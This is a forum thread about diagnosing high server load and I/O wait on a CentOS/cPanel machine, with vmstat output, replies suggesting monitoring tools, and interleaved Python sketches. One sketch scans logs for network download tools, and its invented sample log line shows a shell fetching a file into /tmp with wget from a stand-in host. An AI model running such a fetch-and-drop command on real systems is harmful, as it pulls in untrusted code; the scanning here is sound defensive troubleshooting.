So I've done some reading about how to understand the stats that the top command gives you, and I am fairly confident that my problem is an I/O problem, as the wa value when my server load goes through the roof is generally in the 90%+ range.
So then I used vmstat and ifconfig to see if it was a disk problem and/or a network problem, but I'm not sure what is considered "high values" when I am looking at this data.
vmstat
Code:
procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
 r  b   swpd   free   buff  cache   si   so    bi    bo   in   cs us sy id wa st
 1  1 1034092  20608   4536  94468    5    3   214    53    8    7  5  1 92  3  0
I am pretty sure the bi and bo values are the ones I need to be interested in. Granted, this output wasn't captured during the high server load, so I am going to use it as a baseline for now, but what would be considered high? If it was twice as high as this, is that a problem?
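One thing worth keeping in mind when comparing numbers like these: the first line vmstat prints is an average since boot, so a later sample (for example from `vmstat 5`) says more about what is happening right now. Below is a minimal Python sketch, assuming output in the same column layout as above, that turns a header line and a data line into named fields so that bi, bo and wa can be compared between a quiet baseline and a loaded sample. The function name `parse_vmstat` is made up for illustration.

```python
def parse_vmstat(header_line, data_line):
    """Map vmstat column names (r, b, swpd, ..., wa, st) to integer values."""
    names = header_line.split()
    values = [int(v) for v in data_line.split()]
    if len(names) != len(values):
        raise ValueError("header and data have different column counts")
    return dict(zip(names, values))


# Sample taken from the vmstat output posted above.
header = "r b swpd free buff cache si so bi bo in cs us sy id wa st"
baseline = parse_vmstat(
    header, "1 1 1034092 20608 4536 94468 5 3 214 53 8 7 5 1 92 3 0"
)

# bi/bo are blocks read from / written to block devices per second;
# wa is the percentage of CPU time spent waiting for I/O.
print(baseline["bi"], baseline["bo"], baseline["wa"])
```

There is no universal threshold for "high" bi/bo; what matters is how the values under load compare with a baseline taken on the same disks.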
Now this is a little more complicated, but I think I am looking for the RX packets and TX packets, which are currently 516255425 and 802790881 respectively. Just looking at those numbers, one would assume that they are extremely high. However, my server load at the time of this output was only around 0.70 with a wa of 20%.
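The RX/TX packet counts that ifconfig reports are running totals since the interface came up, so their size alone says little; the rate between two readings is what matters. Here is a rough Python sketch of that arithmetic. The helper name `packets_per_second` and the second set of readings are invented for illustration, and counter wrap-around is not handled.

```python
def packets_per_second(first_count, second_count, interval_seconds):
    """Rate of change between two cumulative counter readings."""
    if interval_seconds <= 0:
        raise ValueError("interval must be positive")
    return (second_count - first_count) / interval_seconds


# First readings are the totals quoted above; the second readings are
# invented, as if ifconfig had been run again 10 seconds later.
rx_rate = packets_per_second(516255425, 516256425, 10)
tx_rate = packets_per_second(802790881, 802792881, 10)
print(rx_rate, tx_rate)
```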
procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
 r  b   swpd   free   buff  cache   si   so    bi    bo   in   cs us sy id wa st
 1 20 1159932  14208   5284  96364    5    3   214    54    0    8  5  1 91  3  0
At the time of the second measurement the load average was 24.93, with no application apparently maxing out RAM or CPU. But with 1GB of swap in use and a 97.7% wait state, you have to search for the bottleneck in a different way. Rebooting the machine returns the system to a "known good" state; then running 'atop', storing data continuously over a longer period, could help to trace back peaks and narrow them down to processes more easily. (Also see 'dstat', 'collectl', 'atsar', SAR.) It would also be interesting to know more about the HW and SW (services mainly) specs, any anomalies in system or daemon logs, and whether this behaviour started at some point (SW installation? updates? configuration changes?).
See those status "D" tasks? They are all counted in loadavg.
And they are probably all waiting on disk I/O. Looks like you have an under- or badly configured disk farm. Either get some more devices or manage the things that are going to exacerbate the situation. Don't run a yum update at the same time as updatedb, say...
Well, I attempted to reboot the server, but it's having a difficult time coming back up. When it did finally come back, it took forever for me to log in. Once I did log in, the server load was already at 0.54, 2.21, 1.35, so something is definitely wrong here. Then the server suddenly went down again for a reboot (I think this happened because, after a few minutes of the server not coming back, I went to my data center's control panel and initiated a reboot from it, so it was probably just a delayed request), so now I am waiting on it to come back online again.
procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
 r  b   swpd   free   buff  cache   si   so    bi    bo   in   cs us sy id wa st
 0  0      0 191692  27548 477972    0    0  4054    63  692  376  8  2 50 40  0
Intel Core2Duo E6750 DC
1GB DDR2 667
250GB SATA HDD
500GB SATA HDD
My software is:
CENTOS 5.3
cPanel 11.24.5-R38506 - WHM 11.24.2 - X 3.9
Along with those, I also have two 10-person Unreal Tournament servers hosted on the machine (they hardly ever have any players) and a TeamSpeak 3 server (it hasn't seen any activity this month).
Run it sometime when the numbers, particularly the short one, are upp-ish.
I will do this. I'm thinking this script just looks at how many processes are in the "D" state, since you mentioned that processes in the "D" state are all counted in the system load. Right?
Something I have just noticed: when I log into the server through SSH/PuTTY, it takes FOREVER. The "Login as:" text pops up instantly, I enter my username, and the password prompt appears immediately, but when I enter my password it takes a really, really long time before it goes through. At least a minute to a minute and a half.
The commands atop, dstat, collectl and atsar did not work.
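The script itself isn't shown here, so the following is not it, only a sketch of the idea in Python: list the processes whose state starts with "D" (uninterruptible sleep, usually waiting on I/O), since those count toward the load average along with runnable ones. It assumes the input is the text printed by `ps -eo stat,pid,comm`; the sample text and the function name `d_state_processes` are illustrative.

```python
def d_state_processes(ps_output):
    """Return (pid, command) for every process in uninterruptible sleep.

    Expects the text printed by `ps -eo stat,pid,comm`: one header line,
    then one line per process with the state, PID and command name.
    """
    found = []
    for line in ps_output.splitlines()[1:]:  # skip the header line
        fields = line.split(None, 2)
        if len(fields) < 3:
            continue
        stat, pid, command = fields
        if stat.startswith("D"):
            found.append((int(pid), command.strip()))
    return found


# Invented sample, not output from the server discussed in this thread.
sample = """STAT   PID COMMAND
Ss       1 init
D      812 kjournald
S     2301 httpd
D+    2410 updatedb
"""
blocked = d_state_processes(sample)
print(len(blocked), blocked)
```

Run against real `ps` output while the load is high, a long list here would point at disk (or other I/O) waits rather than CPU.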
That's because you have to install them before you can use them. They should be in the default CentOS repo or else RPMForge or EPEL.
- Are the two UT servers and the TS3 server the only publicly accessible services running? If not, what other services mainly run?
- Is cPanel (and maybe related paths on the server like /phpmyadmin?) only accessible from your management IP or IP range?
- Do the system or daemon logs show any "odd" lines involving 'links', 'wget' or any network tools?
- Are there by any chance oddly named files in your /tmp, /var/tmp or Apache docroot?
- Did this load problem start right from using the server or at some point? If the latter, can you trace back what happened at that point in terms of HW changes, SW installation or updates, reconfiguration?
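For the log question in the list above, a small Python sketch of the kind of search meant: flag lines that mention a download tool as a whole word. Only 'links' and 'wget' come from the question; the other tool names, the sample lines and the function name `suspicious_lines` are assumptions for illustration. On CentOS a file such as /var/log/messages would be one place to start, and the web server's logs another.

```python
import re

# 'links' and 'wget' come from the question above; 'curl' and 'lynx'
# are an illustrative guess at other "network tools".
TOOLS = ("wget", "links", "curl", "lynx")
PATTERN = re.compile(r"\b(" + "|".join(TOOLS) + r")\b")


def suspicious_lines(lines):
    """Return (line_number, line) pairs that mention one of TOOLS."""
    return [
        (number, line.rstrip("\n"))
        for number, line in enumerate(lines, 1)
        if PATTERN.search(line)
    ]


# Invented log lines for illustration only.
sample = [
    "Jan  1 00:00:01 host crond[123]: (root) CMD (run-parts /etc/cron.hourly)\n",
    "Jan  1 00:03:12 host httpd: sh -c cd /tmp; wget http://example.invalid/x\n",
    "Jan  1 00:05:00 host sshd[456]: Accepted password for user\n",
]
hits = suspicious_lines(sample)
print(hits)
```

Legitimate use of wget by the administrator will show up too, so hits are only a starting point for a closer look.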
Yeah, I realized that after I posted and went Googling. I'm still not 100% sure how to install them. I tried yum install atop but it didn't work.
No, the other service is an FTP server, the one that runs for cPanel. It also has a "public login" that is posted on one of my sites for people to upload specific files to. I monitor it daily, with logs emailed to me showing who logs in and what they do. It doesn't really get that much traffic.
Those things are only accessible through cPanel. You have to log in to get to them.
What logs can I look at for those messages? I ask because I use wget often to copy things to my server that are otherwise too large for me to download and then FTP.
Files in my /tmp:
A bunch of files that look similar to this: sess_381b2d464edc56d83b9026b9fa50d0dc, then
.ICE-unix/
lost+found/
mysql.sock@
spamd-9952-init/
Looks like the same files in /var/tmp
Not sure where the Apache docroot is?
No, the problem seems to happen every once in a while though it has seemed to become a bit more frequent. When I first got the server, I never noticed it. Then sometimes I'd notice the server load get really high, but then it would go away. I always assumed it was the Unreal Tournament servers (I had 5 running at one point plus a BF2 Demo server) but when I shut them down, the load didn't go away.
I am really, really thinking it might have something to do with Apache though. Not sure if it's a coincidence or not, but it seems that when the load is high and I shut down the httpd service the load goes back down. This doesn't explain why the server load is really high upon boot though.